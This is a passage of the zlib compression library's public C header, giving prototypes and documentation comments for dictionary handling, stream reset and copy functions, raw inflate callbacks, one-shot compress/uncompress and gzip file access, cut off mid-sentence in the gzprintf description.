Z_HUFFMAN_ONLY, but give better compression for PNG image data. The strategy parameter only affects the compression ratio but not the correctness of the compressed output even if it is not set appropriately. Z_FIXED prevents the use of dynamic Huffman codes, allowing for a simpler decoder for special applications. deflateInit2 returns Z_OK if success, Z_MEM_ERROR if there was not enough memory, Z_STREAM_ERROR if any parameter is invalid (such as an invalid method), or Z_VERSION_ERROR if the zlib library version (zlib_version) is incompatible with the version assumed by the caller (ZLIB_VERSION). msg is set to null if there is no error message. deflateInit2 does not perform any compression: this will be done by deflate(). */ ZEXTERN int ZEXPORT deflateSetDictionary(z_streamp strm, const Bytef *dictionary, uInt dictLength); /* Initializes the compression dictionary from the given byte sequence without producing any compressed output. When using the zlib format, this function must be called immediately after deflateInit, deflateInit2 or deflateReset, and before any call of deflate. When doing raw deflate, this function must be called either before any call of deflate, or immediately after the completion of a deflate block, i.e. after all input has been consumed and all output has been delivered when using any of the flush options Z_BLOCK, Z_PARTIAL_FLUSH, Z_SYNC_FLUSH, or Z_FULL_FLUSH. The compressor and decompressor must use exactly the same dictionary (see inflateSetDictionary). The dictionary should consist of strings (byte sequences) that are likely to be encountered later in the data to be compressed, with the most commonly used strings preferably put towards the end of the dictionary. Using a dictionary is most useful when the data to be compressed is short and can be predicted with good accuracy; the data can then be compressed better than with the default empty dictionary. Depending on the size of the compression data structures selected by deflateInit or deflateInit2, a part of the dictionary may in effect be discarded, for example if the dictionary is larger than the window size provided in deflateInit or deflateInit2. Thus the strings most likely to be useful should be put at the end of the dictionary, not at the front. In addition, the current implementation of deflate will use at most the window size minus 262 bytes of the provided dictionary. Upon return of this function, strm->adler is set to the Adler-32 value of the dictionary; the decompressor may later use this value to determine which dictionary has been used by the compressor. (The Adler-32 value applies to the whole dictionary even if only a subset of the dictionary is actually used by the compressor.) If a raw deflate was requested, then the Adler-32 value is not computed and strm->adler is not set. deflateSetDictionary returns Z_OK if success, or Z_STREAM_ERROR if a parameter is invalid (e.g. dictionary being Z_NULL) or the stream state is inconsistent (for example if deflate has already been called for this stream or if not at a block boundary for raw deflate). deflateSetDictionary does not perform any compression: this will be done by deflate(). */ ZEXTERN int ZEXPORT deflateGetDictionary(z_streamp strm, Bytef *dictionary, uInt *dictLength); /* Returns the sliding dictionary being maintained by deflate. dictLength is set to the number of bytes in the dictionary, and that many bytes are copied to dictionary. dictionary must have enough space, where 32768 bytes is always enough. If deflateGetDictionary() is called with dictionary equal to Z_NULL, then only the dictionary length is returned, and nothing is copied. Similarly, if dictLength is Z_NULL, then it is not set. deflateGetDictionary() may return a length less than the window size, even when more than the window size in input has been provided. It may return up to 258 bytes less in that case, due to how zlib's implementation of deflate manages the sliding window and lookahead for matches, where matches can be up to 258 bytes long. If the application needs the last window-size bytes of input, then that would need to be saved by the application outside of zlib. deflateGetDictionary returns Z_OK on success, or Z_STREAM_ERROR if the stream state is inconsistent. */ ZEXTERN int ZEXPORT deflateCopy(z_streamp dest, z_streamp source); /* Sets the destination stream as a complete copy of the source stream. This function can be useful when several compression strategies will be tried, for example when there are several ways of pre-processing the input data with a filter. The streams that will be discarded should then be freed by calling deflateEnd. Note that deflateCopy duplicates the internal compression state which can be quite large, so this strategy is slow and can consume lots of memory. deflateCopy returns Z_OK if success, Z_MEM_ERROR if there was not enough memory, Z_STREAM_ERROR if the source stream state was inconsistent (such as zalloc being Z_NULL). msg is left unchanged in both source and destination. */ ZEXTERN int ZEXPORT deflateReset(z_streamp strm); /* This function is equivalent to deflateEnd followed by deflateInit, but does not free and reallocate the internal compression state. The stream will leave the compression level and any other attributes that may have been set unchanged. total_in, total_out, adler, and msg are initialized. deflateReset returns Z_OK if success, or Z_STREAM_ERROR if the source stream state was inconsistent (such as zalloc or state being Z_NULL). */ ZEXTERN int ZEXPORT deflateParams(z_streamp strm, int level, int strategy); /* Dynamically update the compression level and compression strategy. The interpretation of level and strategy is as in deflateInit2(). This can be used to switch between compression and straight copy of the input data, or to switch to a different kind of input data requiring a different strategy. If the compression approach (which is a function of the level) or the strategy is changed, and if there have been any deflate() calls since the state was initialized or reset, then the input available so far is compressed with the old level and strategy using deflate(strm, Z_BLOCK). There are three approaches for the compression levels 0, 1..3, and 4..9 respectively. The new level and strategy will take effect at the next call of deflate(). If a deflate(strm, Z_BLOCK) is performed by deflateParams(), and it does not have enough output space to complete, then the parameter change will not take effect. In this case, deflateParams() can be called again with the same parameters and more output space to try again. In order to assure a change in the parameters on the first try, the deflate stream should be flushed using deflate() with Z_BLOCK or other flush request until strm.avail_out is not zero, before calling deflateParams(). Then no more input data should be provided before the deflateParams() call. If this is done, the old level and strategy will be applied to the data compressed before deflateParams(), and the new level and strategy will be applied to the data compressed after deflateParams(). deflateParams returns Z_OK on success, Z_STREAM_ERROR if the source stream state was inconsistent or if a parameter was invalid, or Z_BUF_ERROR if there was not enough output space to complete the compression of the available input data before a change in the strategy or approach. Note that in the case of a Z_BUF_ERROR, the parameters are not changed. A return value of Z_BUF_ERROR is not fatal, in which case deflateParams() can be retried with more output space. */ ZEXTERN int ZEXPORT deflateTune(z_streamp strm, int good_length, int max_lazy, int nice_length, int max_chain); /* Fine tune deflate's internal compression parameters. This should only be used by someone who understands the algorithm used by zlib's deflate for searching for the best matching string, and even then only by the most fanatic optimizer trying to squeeze out the last compressed bit for their specific input data. Read the deflate.c source code for the meaning of the max_lazy, good_length, nice_length, and max_chain parameters. deflateTune() can be called after deflateInit() or deflateInit2(), and returns Z_OK on success, or Z_STREAM_ERROR for an invalid deflate stream. */ ZEXTERN uLong ZEXPORT deflateBound(z_streamp strm, uLong sourceLen); /* deflateBound() returns an upper bound on the compressed size after deflation of sourceLen bytes. It must be called after deflateInit() or deflateInit2(), and after deflateSetHeader(), if used. This would be used to allocate an output buffer for deflation in a single pass, and so would be called before deflate(). If that first deflate() call is provided the sourceLen input bytes, an output buffer allocated to the size returned by deflateBound(), and the flush value Z_FINISH, then deflate() is guaranteed to return Z_STREAM_END. Note that it is possible for the compressed size to be larger than the value returned by deflateBound() if flush options other than Z_FINISH or Z_NO_FLUSH are used. */ ZEXTERN int ZEXPORT deflatePending(z_streamp strm, unsigned *pending, int *bits); /* deflatePending() returns the number of bytes and bits of output that have been generated, but not yet provided in the available output. The bytes not provided would be due to the available output space having being consumed. The number of bits of output not provided are between 0 and 7, where they await more bits to join them in order to fill out a full byte. If pending or bits are Z_NULL, then those values are not set. deflatePending returns Z_OK if success, or Z_STREAM_ERROR if the source stream state was inconsistent. */ ZEXTERN int ZEXPORT deflatePrime(z_streamp strm, int bits, int value); /* deflatePrime() inserts bits in the deflate output stream. The intent is that this function is used to start off the deflate output with the bits leftover from a previous deflate stream when appending to it. As such, this function can only be used for raw deflate, and must be used before the first deflate() call after a deflateInit2() or deflateReset(). bits must be less than or equal to 16, and that many of the least significant bits of value will be inserted in the output. deflatePrime returns Z_OK if success, Z_BUF_ERROR if there was not enough room in the internal buffer to insert the bits, or Z_STREAM_ERROR if the source stream state was inconsistent. */ ZEXTERN int ZEXPORT deflateSetHeader(z_streamp strm, gz_headerp head); /* deflateSetHeader() provides gzip header information for when a gzip stream is requested by deflateInit2(). deflateSetHeader() may be called after deflateInit2() or deflateReset() and before the first call of deflate(). The text, time, os, extra field, name, and comment information in the provided gz_header structure are written to the gzip header (xflag is ignored -- the extra flags are set according to the compression level). The caller must assure that, if not Z_NULL, name and comment are terminated with a zero byte, and that if extra is not Z_NULL, that extra_len bytes are available there. If hcrc is true, a gzip header crc is included. Note that the current versions of the command-line version of gzip (up through version 1.3.x) do not support header crc's, and will report that it is a "multi-part gzip file" and give up. If deflateSetHeader is not used, the default gzip header has text false, the time set to zero, and os set to the current operating system, with no extra, name, or comment fields. The gzip header is returned to the default state by deflateReset(). deflateSetHeader returns Z_OK if success, or Z_STREAM_ERROR if the source stream state was inconsistent. */ /* ZEXTERN int ZEXPORT inflateInit2(z_streamp strm, int windowBits); This is another version of inflateInit with an extra parameter. The fields next_in, avail_in, zalloc, zfree and opaque must be initialized before by the caller. The windowBits parameter is the base two logarithm of the maximum window size (the size of the history buffer). It should be in the range 8..15 for this version of the library. The default value is 15 if inflateInit is used instead. windowBits must be greater than or equal to the windowBits value provided to deflateInit2() while compressing, or it must be equal to 15 if deflateInit2() was not used. If a compressed stream with a larger window size is given as input, inflate() will return with the error code Z_DATA_ERROR instead of trying to allocate a larger window. windowBits can also be zero to request that inflate use the window size in the zlib header of the compressed stream. windowBits can also be -8..-15 for raw inflate. In this case, -windowBits determines the window size. inflate() will then process raw deflate data, not looking for a zlib or gzip header, not generating a check value, and not looking for any check values for comparison at the end of the stream. This is for use with other formats that use the deflate compressed data format such as zip. Those formats provide their own check values. If a custom format is developed using the raw deflate format for compressed data, it is recommended that a check value such as an Adler-32 or a CRC-32 be applied to the uncompressed data as is done in the zlib, gzip, and zip formats. For most applications, the zlib format should be used as is. Note that comments above on the use in deflateInit2() applies to the magnitude of windowBits. windowBits can also be greater than 15 for optional gzip decoding. Add 32 to windowBits to enable zlib and gzip decoding with automatic header detection, or add 16 to decode only the gzip format (the zlib format will return a Z_DATA_ERROR). If a gzip stream is being decoded, strm->adler is a CRC-32 instead of an Adler-32. Unlike the gunzip utility and gzread() (see below), inflate() will *not* automatically decode concatenated gzip members. inflate() will return Z_STREAM_END at the end of the gzip member. The state would need to be reset to continue decoding a subsequent gzip member. This *must* be done if there is more data after a gzip member, in order for the decompression to be compliant with the gzip standard (RFC 1952). inflateInit2 returns Z_OK if success, Z_MEM_ERROR if there was not enough memory, Z_VERSION_ERROR if the zlib library version is incompatible with the version assumed by the caller, or Z_STREAM_ERROR if the parameters are invalid, such as a null pointer to the structure. msg is set to null if there is no error message. inflateInit2 does not perform any decompression apart from possibly reading the zlib header if present: actual decompression will be done by inflate(). (So next_in and avail_in may be modified, but next_out and avail_out are unused and unchanged.) The current implementation of inflateInit2() does not process any header information -- that is deferred until inflate() is called. */ ZEXTERN int ZEXPORT inflateSetDictionary(z_streamp strm, const Bytef *dictionary, uInt dictLength); /* Initializes the decompression dictionary from the given uncompressed byte sequence. This function must be called immediately after a call of inflate, if that call returned Z_NEED_DICT. The dictionary chosen by the compressor can be determined from the Adler-32 value returned by that call of inflate. The compressor and decompressor must use exactly the same dictionary (see deflateSetDictionary). For raw inflate, this function can be called at any time to set the dictionary. If the provided dictionary is smaller than the window and there is already data in the window, then the provided dictionary will amend what's there. The application must insure that the dictionary that was used for compression is provided. inflateSetDictionary returns Z_OK if success, Z_STREAM_ERROR if a parameter is invalid (e.g. dictionary being Z_NULL) or the stream state is inconsistent, Z_DATA_ERROR if the given dictionary doesn't match the expected one (incorrect Adler-32 value). inflateSetDictionary does not perform any decompression: this will be done by subsequent calls of inflate(). */ ZEXTERN int ZEXPORT inflateGetDictionary(z_streamp strm, Bytef *dictionary, uInt *dictLength); /* Returns the sliding dictionary being maintained by inflate. dictLength is set to the number of bytes in the dictionary, and that many bytes are copied to dictionary. dictionary must have enough space, where 32768 bytes is always enough. If inflateGetDictionary() is called with dictionary equal to Z_NULL, then only the dictionary length is returned, and nothing is copied. Similarly, if dictLength is Z_NULL, then it is not set. inflateGetDictionary returns Z_OK on success, or Z_STREAM_ERROR if the stream state is inconsistent. */ ZEXTERN int ZEXPORT inflateSync(z_streamp strm); /* Skips invalid compressed data until a possible full flush point (see above for the description of deflate with Z_FULL_FLUSH) can be found, or until all available input is skipped. No output is provided. inflateSync searches for a 00 00 FF FF pattern in the compressed data. All full flush points have this pattern, but not all occurrences of this pattern are full flush points. inflateSync returns Z_OK if a possible full flush point has been found, Z_BUF_ERROR if no more input was provided, Z_DATA_ERROR if no flush point has been found, or Z_STREAM_ERROR if the stream structure was inconsistent. In the success case, the application may save the current current value of total_in which indicates where valid compressed data was found. In the error case, the application may repeatedly call inflateSync, providing more input each time, until success or end of the input data. */ ZEXTERN int ZEXPORT inflateCopy(z_streamp dest, z_streamp source); /* Sets the destination stream as a complete copy of the source stream. This function can be useful when randomly accessing a large stream. The first pass through the stream can periodically record the inflate state, allowing restarting inflate at those points when randomly accessing the stream. inflateCopy returns Z_OK if success, Z_MEM_ERROR if there was not enough memory, Z_STREAM_ERROR if the source stream state was inconsistent (such as zalloc being Z_NULL). msg is left unchanged in both source and destination. */ ZEXTERN int ZEXPORT inflateReset(z_streamp strm); /* This function is equivalent to inflateEnd followed by inflateInit, but does not free and reallocate the internal decompression state. The stream will keep attributes that may have been set by inflateInit2. total_in, total_out, adler, and msg are initialized. inflateReset returns Z_OK if success, or Z_STREAM_ERROR if the source stream state was inconsistent (such as zalloc or state being Z_NULL). */ ZEXTERN int ZEXPORT inflateReset2(z_streamp strm, int windowBits); /* This function is the same as inflateReset, but it also permits changing the wrap and window size requests. The windowBits parameter is interpreted the same as it is for inflateInit2. If the window size is changed, then the memory allocated for the window is freed, and the window will be reallocated by inflate() if needed. inflateReset2 returns Z_OK if success, or Z_STREAM_ERROR if the source stream state was inconsistent (such as zalloc or state being Z_NULL), or if the windowBits parameter is invalid. */ ZEXTERN int ZEXPORT inflatePrime(z_streamp strm, int bits, int value); /* This function inserts bits in the inflate input stream. The intent is that this function is used to start inflating at a bit position in the middle of a byte. The provided bits will be used before any bytes are used from next_in. This function should only be used with raw inflate, and should be used before the first inflate() call after inflateInit2() or inflateReset(). bits must be less than or equal to 16, and that many of the least significant bits of value will be inserted in the input. If bits is negative, then the input stream bit buffer is emptied. Then inflatePrime() can be called again to put bits in the buffer. This is used to clear out bits leftover after feeding inflate a block description prior to feeding inflate codes. inflatePrime returns Z_OK if success, or Z_STREAM_ERROR if the source stream state was inconsistent. */ ZEXTERN long ZEXPORT inflateMark(z_streamp strm); /* This function returns two values, one in the lower 16 bits of the return value, and the other in the remaining upper bits, obtained by shifting the return value down 16 bits. If the upper value is -1 and the lower value is zero, then inflate() is currently decoding information outside of a block. If the upper value is -1 and the lower value is non-zero, then inflate is in the middle of a stored block, with the lower value equaling the number of bytes from the input remaining to copy. If the upper value is not -1, then it is the number of bits back from the current bit position in the input of the code (literal or length/distance pair) currently being processed. In that case the lower value is the number of bytes already emitted for that code. A code is being processed if inflate is waiting for more input to complete decoding of the code, or if it has completed decoding but is waiting for more output space to write the literal or match data. inflateMark() is used to mark locations in the input data for random access, which may be at bit positions, and to note those cases where the output of a code may span boundaries of random access blocks. The current location in the input stream can be determined from avail_in and data_type as noted in the description for the Z_BLOCK flush parameter for inflate. inflateMark returns the value noted above, or -65536 if the provided source stream state was inconsistent. */ ZEXTERN int ZEXPORT inflateGetHeader(z_streamp strm, gz_headerp head); /* inflateGetHeader() requests that gzip header information be stored in the provided gz_header structure. inflateGetHeader() may be called after inflateInit2() or inflateReset(), and before the first call of inflate(). As inflate() processes the gzip stream, head->done is zero until the header is completed, at which time head->done is set to one. If a zlib stream is being decoded, then head->done is set to -1 to indicate that there will be no gzip header information forthcoming. Note that Z_BLOCK or Z_TREES can be used to force inflate() to return immediately after header processing is complete and before any actual data is decompressed. The text, time, xflags, and os fields are filled in with the gzip header contents. hcrc is set to true if there is a header CRC. (The header CRC was valid if done is set to one.) If extra is not Z_NULL, then extra_max contains the maximum number of bytes to write to extra. Once done is true, extra_len contains the actual extra field length, and extra contains the extra field, or that field truncated if extra_max is less than extra_len. If name is not Z_NULL, then up to name_max characters are written there, terminated with a zero unless the length is greater than name_max. If comment is not Z_NULL, then up to comm_max characters are written there, terminated with a zero unless the length is greater than comm_max. When any of extra, name, or comment are not Z_NULL and the respective field is not present in the header, then that field is set to Z_NULL to signal its absence. This allows the use of deflateSetHeader() with the returned structure to duplicate the header. However if those fields are set to allocated memory, then the application will need to save those pointers elsewhere so that they can be eventually freed. If inflateGetHeader is not used, then the header information is simply discarded. The header is always checked for validity, including the header CRC if present. inflateReset() will reset the process to discard the header information. The application would need to call inflateGetHeader() again to retrieve the header from the next gzip stream. inflateGetHeader returns Z_OK if success, or Z_STREAM_ERROR if the source stream state was inconsistent. */ /* ZEXTERN int ZEXPORT inflateBackInit(z_streamp strm, int windowBits, unsigned char FAR *window); Initialize the internal stream state for decompression using inflateBack() calls. The fields zalloc, zfree and opaque in strm must be initialized before the call. If zalloc and zfree are Z_NULL, then the default library- derived memory allocation routines are used. windowBits is the base two logarithm of the window size, in the range 8..15. window is a caller supplied buffer of that size. Except for special applications where it is assured that deflate was used with small window sizes, windowBits must be 15 and a 32K byte window must be supplied to be able to decompress general deflate streams. See inflateBack() for the usage of these routines. inflateBackInit will return Z_OK on success, Z_STREAM_ERROR if any of the parameters are invalid, Z_MEM_ERROR if the internal state could not be allocated, or Z_VERSION_ERROR if the version of the library does not match the version of the header file. */ typedef unsigned (*in_func)(void FAR *, z_const unsigned char FAR * FAR *); typedef int (*out_func)(void FAR *, unsigned char FAR *, unsigned); ZEXTERN int ZEXPORT inflateBack(z_streamp strm, in_func in, void FAR *in_desc, out_func out, void FAR *out_desc); /* inflateBack() does a raw inflate with a single call using a call-back interface for input and output. This is potentially more efficient than inflate() for file i/o applications, in that it avoids copying between the output and the sliding window by simply making the window itself the output buffer. inflate() can be faster on modern CPUs when used with large buffers. inflateBack() trusts the application to not change the output buffer passed by the output function, at least until inflateBack() returns. inflateBackInit() must be called first to allocate the internal state and to initialize the state with the user-provided window buffer. inflateBack() may then be used multiple times to inflate a complete, raw deflate stream with each call. inflateBackEnd() is then called to free the allocated state. A raw deflate stream is one with no zlib or gzip header or trailer. This routine would normally be used in a utility that reads zip or gzip files and writes out uncompressed files. The utility would decode the header and process the trailer on its own, hence this routine expects only the raw deflate stream to decompress. This is different from the default behavior of inflate(), which expects a zlib header and trailer around the deflate stream. inflateBack() uses two subroutines supplied by the caller that are then called by inflateBack() for input and output. inflateBack() calls those routines until it reads a complete deflate stream and writes out all of the uncompressed data, or until it encounters an error. The function's parameters and return types are defined above in the in_func and out_func typedefs. inflateBack() will call in(in_desc, &buf) which should return the number of bytes of provided input, and a pointer to that input in buf. If there is no input available, in() must return zero -- buf is ignored in that case -- and inflateBack() will return a buffer error. inflateBack() will call out(out_desc, buf, len) to write the uncompressed data buf[0..len-1]. out() should return zero on success, or non-zero on failure. If out() returns non-zero, inflateBack() will return with an error. Neither in() nor out() are permitted to change the contents of the window provided to inflateBackInit(), which is also the buffer that out() uses to write from. The length written by out() will be at most the window size. Any non-zero amount of input may be provided by in(). For convenience, inflateBack() can be provided input on the first call by setting strm->next_in and strm->avail_in. If that input is exhausted, then in() will be called. Therefore strm->next_in must be initialized before calling inflateBack(). If strm->next_in is Z_NULL, then in() will be called immediately for input. If strm->next_in is not Z_NULL, then strm->avail_in must also be initialized, and then if strm->avail_in is not zero, input will initially be taken from strm->next_in[0 .. strm->avail_in - 1]. The in_desc and out_desc parameters of inflateBack() is passed as the first parameter of in() and out() respectively when they are called. These descriptors can be optionally used to pass any information that the caller- supplied in() and out() functions need to do their job. On return, inflateBack() will set strm->next_in and strm->avail_in to pass back any unused input that was provided by the last in() call. The return values of inflateBack() can be Z_STREAM_END on success, Z_BUF_ERROR if in() or out() returned an error, Z_DATA_ERROR if there was a format error in the deflate stream (in which case strm->msg is set to indicate the nature of the error), or Z_STREAM_ERROR if the stream was not properly initialized. In the case of Z_BUF_ERROR, an input or output error can be distinguished using strm->next_in which will be Z_NULL only if in() returned an error. If strm->next_in is not Z_NULL, then the Z_BUF_ERROR was due to out() returning non-zero. (in() will always be called before out(), so strm->next_in is assured to be defined if out() returns non-zero.) Note that inflateBack() cannot return Z_OK. */ ZEXTERN int ZEXPORT inflateBackEnd(z_streamp strm); /* All memory allocated by inflateBackInit() is freed. inflateBackEnd() returns Z_OK on success, or Z_STREAM_ERROR if the stream state was inconsistent. */ ZEXTERN uLong ZEXPORT zlibCompileFlags(void); /* Return flags indicating compile-time options. Type sizes, two bits each, 00 = 16 bits, 01 = 32, 10 = 64, 11 = other: 1.0: size of uInt 3.2: size of uLong 5.4: size of voidpf (pointer) 7.6: size of z_off_t Compiler, assembler, and debug options: 8: ZLIB_DEBUG 9: ASMV or ASMINF -- use ASM code 10: ZLIB_WINAPI -- exported functions use the WINAPI calling convention 11: 0 (reserved) One-time table building (smaller code, but not thread-safe if true): 12: BUILDFIXED -- build static block decoding tables when needed 13: DYNAMIC_CRC_TABLE -- build CRC calculation tables when needed 14,15: 0 (reserved) Library content (indicates missing functionality): 16: NO_GZCOMPRESS -- gz* functions cannot compress (to avoid linking deflate code when not needed) 17: NO_GZIP -- deflate can't write gzip streams, and inflate can't detect and decode gzip streams (to avoid linking crc code) 18-19: 0 (reserved) Operation variations (changes in library functionality): 20: PKZIP_BUG_WORKAROUND -- slightly more permissive inflate 21: FASTEST -- deflate algorithm with only one, lowest compression level 22,23: 0 (reserved) The sprintf variant used by gzprintf (zero is best): 24: 0 = vs*, 1 = s* -- 1 means limited to 20 arguments after the format 25: 0 = *nprintf, 1 = *printf -- 1 means gzprintf() not secure! 26: 0 = returns value, 1 = void -- 1 means inferred string length returned Remainder: 27-31: 0 (reserved) */ #ifndef Z_SOLO /* utility functions */ /* The following utility functions are implemented on top of the basic stream-oriented functions. To simplify the interface, some default options are assumed (compression level and memory usage, standard memory allocation functions). The source code of these utility functions can be modified if you need special options. */ ZEXTERN int ZEXPORT compress(Bytef *dest, uLongf *destLen, const Bytef *source, uLong sourceLen); /* Compresses the source buffer into the destination buffer. sourceLen is the byte length of the source buffer. Upon entry, destLen is the total size of the destination buffer, which must be at least the value returned by compressBound(sourceLen). Upon exit, destLen is the actual size of the compressed data. compress() is equivalent to compress2() with a level parameter of Z_DEFAULT_COMPRESSION. compress returns Z_OK if success, Z_MEM_ERROR if there was not enough memory, Z_BUF_ERROR if there was not enough room in the output buffer. */ ZEXTERN int ZEXPORT compress2(Bytef *dest, uLongf *destLen, const Bytef *source, uLong sourceLen, int level); /* Compresses the source buffer into the destination buffer. The level parameter has the same meaning as in deflateInit. sourceLen is the byte length of the source buffer. Upon entry, destLen is the total size of the destination buffer, which must be at least the value returned by compressBound(sourceLen). Upon exit, destLen is the actual size of the compressed data. compress2 returns Z_OK if success, Z_MEM_ERROR if there was not enough memory, Z_BUF_ERROR if there was not enough room in the output buffer, Z_STREAM_ERROR if the level parameter is invalid. */ ZEXTERN uLong ZEXPORT compressBound(uLong sourceLen); /* compressBound() returns an upper bound on the compressed size after compress() or compress2() on sourceLen bytes. It would be used before a compress() or compress2() call to allocate the destination buffer. */ ZEXTERN int ZEXPORT uncompress(Bytef *dest, uLongf *destLen, const Bytef *source, uLong sourceLen); /* Decompresses the source buffer into the destination buffer. sourceLen is the byte length of the source buffer. Upon entry, destLen is the total size of the destination buffer, which must be large enough to hold the entire uncompressed data. (The size of the uncompressed data must have been saved previously by the compressor and transmitted to the decompressor by some mechanism outside the scope of this compression library.) Upon exit, destLen is the actual size of the uncompressed data. uncompress returns Z_OK if success, Z_MEM_ERROR if there was not enough memory, Z_BUF_ERROR if there was not enough room in the output buffer, or Z_DATA_ERROR if the input data was corrupted or incomplete. In the case where there is not enough room, uncompress() will fill the output buffer with the uncompressed data up to that point. */ ZEXTERN int ZEXPORT uncompress2(Bytef *dest, uLongf *destLen, const Bytef *source, uLong *sourceLen); /* Same as uncompress, except that sourceLen is a pointer, where the length of the source is *sourceLen. On return, *sourceLen is the number of source bytes consumed. */ /* gzip file access functions */ /* This library supports reading and writing files in gzip (.gz) format with an interface similar to that of stdio, using the functions that start with "gz". The gzip format is different from the zlib format. gzip is a gzip wrapper, documented in RFC 1952, wrapped around a deflate stream. */ typedef struct gzFile_s *gzFile; /* semi-opaque gzip file descriptor */ /* ZEXTERN gzFile ZEXPORT gzopen(const char *path, const char *mode); Open the gzip (.gz) file at path for reading and decompressing, or compressing and writing. The mode parameter is as in fopen ("rb" or "wb") but can also include a compression level ("wb9") or a strategy: 'f' for filtered data as in "wb6f", 'h' for Huffman-only compression as in "wb1h", 'R' for run-length encoding as in "wb1R", or 'F' for fixed code compression as in "wb9F". (See the description of deflateInit2 for more information about the strategy parameter.) 'T' will request transparent writing or appending with no compression and not using the gzip format. "a" can be used instead of "w" to request that the gzip stream that will be written be appended to the file. "+" will result in an error, since reading and writing to the same gzip file is not supported. The addition of "x" when writing will create the file exclusively, which fails if the file already exists. On systems that support it, the addition of "e" when reading or writing will set the flag to close the file on an execve() call. These functions, as well as gzip, will read and decode a sequence of gzip streams in a file. The append function of gzopen() can be used to create such a file. (Also see gzflush() for another way to do this.) When appending, gzopen does not test whether the file begins with a gzip stream, nor does it look for the end of the gzip streams to begin appending. gzopen will simply append a gzip stream to the existing file. gzopen can be used to read a file which is not in gzip format; in this case gzread will directly read from the file without decompression. When reading, this will be detected automatically by looking for the magic two- byte gzip header. gzopen returns NULL if the file could not be opened, if there was insufficient memory to allocate the gzFile state, or if an invalid mode was specified (an 'r', 'w', or 'a' was not provided, or '+' was provided). errno can be checked to determine if the reason gzopen failed was that the file could not be opened. */ ZEXTERN gzFile ZEXPORT gzdopen(int fd, const char *mode); /* Associate a gzFile with the file descriptor fd. File descriptors are obtained from calls like open, dup, creat, pipe or fileno (if the file has been previously opened with fopen). The mode parameter is as in gzopen. The next call of gzclose on the returned gzFile will also close the file descriptor fd, just like fclose(fdopen(fd, mode)) closes the file descriptor fd. If you want to keep fd open, use fd = dup(fd_keep); gz = gzdopen(fd, mode);. The duplicated descriptor should be saved to avoid a leak, since gzdopen does not close fd if it fails. If you are using fileno() to get the file descriptor from a FILE *, then you will have to use dup() to avoid double-close()ing the file descriptor. Both gzclose() and fclose() will close the associated file descriptor, so they need to have different file descriptors. gzdopen returns NULL if there was insufficient memory to allocate the gzFile state, if an invalid mode was specified (an 'r', 'w', or 'a' was not provided, or '+' was provided), or if fd is -1. The file descriptor is not used until the next gz* read, write, seek, or close operation, so gzdopen will not detect if fd is invalid (unless fd is -1). */ ZEXTERN int ZEXPORT gzbuffer(gzFile file, unsigned size); /* Set the internal buffer size used by this library's functions for file to size. The default buffer size is 8192 bytes. This function must be called after gzopen() or gzdopen(), and before any other calls that read or write the file. The buffer memory allocation is always deferred to the first read or write. Three times that size in buffer space is allocated. A larger buffer size of, for example, 64K or 128K bytes will noticeably increase the speed of decompression (reading). The new buffer size also affects the maximum length for gzprintf(). gzbuffer() returns 0 on success, or -1 on failure, such as being called too late. */ ZEXTERN int ZEXPORT gzsetparams(gzFile file, int level, int strategy); /* Dynamically update the compression level and strategy for file. See the description of deflateInit2 for the meaning of these parameters. Previously provided data is flushed before applying the parameter changes. gzsetparams returns Z_OK if success, Z_STREAM_ERROR if the file was not opened for writing, Z_ERRNO if there is an error writing the flushed data, or Z_MEM_ERROR if there is a memory allocation error. */ ZEXTERN int ZEXPORT gzread(gzFile file, voidp buf, unsigned len); /* Read and decompress up to len uncompressed bytes from file into buf. If the input file is not in gzip format, gzread copies the given number of bytes into the buffer directly from the file. After reaching the end of a gzip stream in the input, gzread will continue to read, looking for another gzip stream. Any number of gzip streams may be concatenated in the input file, and will all be decompressed by gzread(). If something other than a gzip stream is encountered after a gzip stream, that remaining trailing garbage is ignored (and no error is returned). gzread can be used to read a gzip file that is being concurrently written. Upon reaching the end of the input, gzread will return with the available data. If the error code returned by gzerror is Z_OK or Z_BUF_ERROR, then gzclearerr can be used to clear the end of file indicator in order to permit gzread to be tried again. Z_OK indicates that a gzip stream was completed on the last gzread. Z_BUF_ERROR indicates that the input file ended in the middle of a gzip stream. Note that gzread does not return -1 in the event of an incomplete gzip stream. This error is deferred until gzclose(), which will return Z_BUF_ERROR if the last gzread ended in the middle of a gzip stream. Alternatively, gzerror can be used before gzclose to detect this case. gzread returns the number of uncompressed bytes actually read, less than len for end of file, or -1 for error. If len is too large to fit in an int, then nothing is read, -1 is returned, and the error state is set to Z_STREAM_ERROR. */ ZEXTERN z_size_t ZEXPORT gzfread(voidp buf, z_size_t size, z_size_t nitems, gzFile file); /* Read and decompress up to nitems items of size size from file into buf, otherwise operating as gzread() does. This duplicates the interface of stdio's fread(), with size_t request and return types. If the library defines size_t, then z_size_t is identical to size_t. If not, then z_size_t is an unsigned integer type that can contain a pointer. gzfread() returns the number of full items read of size size, or zero if the end of the file was reached and a full item could not be read, or if there was an error. gzerror() must be consulted if zero is returned in order to determine if there was an error. If the multiplication of size and nitems overflows, i.e. the product does not fit in a z_size_t, then nothing is read, zero is returned, and the error state is set to Z_STREAM_ERROR. In the event that the end of file is reached and only a partial item is available at the end, i.e. the remaining uncompressed data length is not a multiple of size, then the final partial item is nevertheless read into buf and the end-of-file flag is set. The length of the partial item read is not provided, but could be inferred from the result of gztell(). This behavior is the same as the behavior of fread() implementations in common libraries, but it prevents the direct use of gzfread() to read a concurrently written file, resetting and retrying on end-of-file, when size is not 1. */ ZEXTERN int ZEXPORT gzwrite(gzFile file, voidpc buf, unsigned len); /* Compress and write the len uncompressed bytes at buf to file. gzwrite returns the number of uncompressed bytes written or 0 in case of error. */ ZEXTERN z_size_t ZEXPORT gzfwrite(voidpc buf, z_size_t size, z_size_t nitems, gzFile file); /* Compress and write nitems items of size size from buf to file, duplicating the interface of stdio's fwrite(), with size_t request and return types. If the library defines size_t, then z_size_t is identical to size_t. If not, then z_size_t is an unsigned integer type that can contain a pointer. gzfwrite() returns the number of full items written of size size, or zero if there was an error. If the multiplication of size and nitems overflows, i.e. the product does not fit in a z_size_t, then nothing is written, zero is returned, and the error state is set to Z_STREAM_ERROR. */ ZEXTERN int ZEXPORTVA gzprintf(gzFile file, const char *format, ...); /* Convert, format, compress, and write the arguments (...) to file under control of the string format, as in fprintf. gzprintf returns the number of uncompressed bytes actually written, or a negative zlib error code in case of error. The number of uncompressed bytes written is limited to 8191, or one less than the buffer size given to gzbuffer(). The caller should assure that this limit is not exceeded. If it is exceeded, then gzprintf() will return an error (0) with nothing written. In this case, there may also be a buffer overflow with unpredictable consequences, which is possible only if zlib was compiled with the 